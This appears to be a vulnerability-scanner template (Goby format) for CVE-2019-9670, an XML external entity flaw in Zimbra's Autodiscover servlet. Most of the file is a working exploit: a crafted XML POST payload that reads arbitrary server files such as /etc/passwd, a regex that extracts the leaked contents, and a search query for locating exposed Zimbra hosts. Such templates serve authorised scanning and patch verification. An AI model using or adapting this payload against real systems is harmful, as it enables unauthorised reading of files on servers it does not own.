mirror of https://github.com/qwqdanchun/Goby.git
91 lines
3.1 KiB
JSON
91 lines
3.1 KiB
JSON
|
{
|
||
|
"Name": "Zimbra XXE (CVE-2019-9670)",
|
||
|
"Description": "mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.",
|
||
|
"Product": "Zimbra",
|
||
|
"Homepage": "https://www.zimbra.com/",
|
||
|
"DisclosureDate": "2019-05-29",
|
||
|
"Author": "itardc@163.com",
|
||
|
"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/Zimbra/CVE-2019-9670/CVE-2019-9670.gif",
|
||
|
"FofaQuery": "app=\"Zimbra\"",
|
||
|
"GobyQuery": "app=\"Zimbra\"",
|
||
|
"Level": "3",
|
||
|
"Impact": "",
|
||
|
"Recommendation": "",
|
||
|
"References": [
|
||
|
"http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html",
|
||
|
"http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce",
|
||
|
"https://bugzilla.zimbra.com/show_bug.cgi?id=109129",
|
||
|
"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories",
|
||
|
"https://www.exploit-db.com/exploits/46693/",
|
||
|
"https://nvd.nist.gov/vuln/detail/CVE-2019-9670",
|
||
|
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670"
|
||
|
],
|
||
|
"HasExp": true,
|
||
|
"ExpParams": [
|
||
|
{
|
||
|
"name": "file",
|
||
|
"type": "createSelect",
|
||
|
"value": "/etc/passwd,/etc/hosts",
|
||
|
"show": ""
|
||
|
}
|
||
|
],
|
||
|
"ExpTips": {
|
||
|
"Type": "",
|
||
|
"Content": ""
|
||
|
},
|
||
|
"ScanSteps": [
|
||
|
"AND",
|
||
|
{
|
||
|
"Request": {
|
||
|
"data": "<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM \"file:./\" >]><Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\"><Request><EMailAddress>test@test.com</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>",
|
||
|
"data_type": "text",
|
||
|
"follow_redirect": false,
|
||
|
"header": {"Content-Type": "application/xml"},
|
||
|
"method": "POST",
|
||
|
"uri": "/Autodiscover/Autodiscover.xml"
|
||
|
},
|
||
|
"ResponseTest": {
|
||
|
"checks": [
|
||
|
{
|
||
|
"bz": "",
|
||
|
"operation": "contains",
|
||
|
"type": "item",
|
||
|
"value": "Requested response schema not available",
|
||
|
"variable": "$body"
|
||
|
}
|
||
|
],
|
||
|
"operation": "AND",
|
||
|
"type": "group"
|
||
|
}
|
||
|
}
|
||
|
],
|
||
|
"ExploitSteps": [
|
||
|
"AND",
|
||
|
{
|
||
|
"Request": {
|
||
|
"data": "<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM \"file://{{{file}}}\" >]><Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\"><Request><EMailAddress>test@test.com</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>",
|
||
|
"data_type": "text",
|
||
|
"follow_redirect": false,
|
||
|
"header": {"Content-Type": "application/xml"},
|
||
|
"method": "POST",
|
||
|
"uri": "/Autodiscover/Autodiscover.xml"
|
||
|
},
|
||
|
"SetVariable": [
|
||
|
"output|lastbody|regex|(?s)<title>Error 503 Requested response schema not available (.*?)</title>"
|
||
|
]
|
||
|
}
|
||
|
],
|
||
|
"Tags": ["xxe"],
|
||
|
"CVEIDs": [
|
||
|
"CVE-2019-9670"
|
||
|
],
|
||
|
"CVSSScore": "9.8",
|
||
|
"AttackSurfaces": {
|
||
|
"Application": ["Zimbra"],
|
||
|
"Support": null,
|
||
|
"Service": null,
|
||
|
"System": null,
|
||
|
"Hardware": null
|
||
|
},
|
||
|
"Disable": false
|
||
|
}
|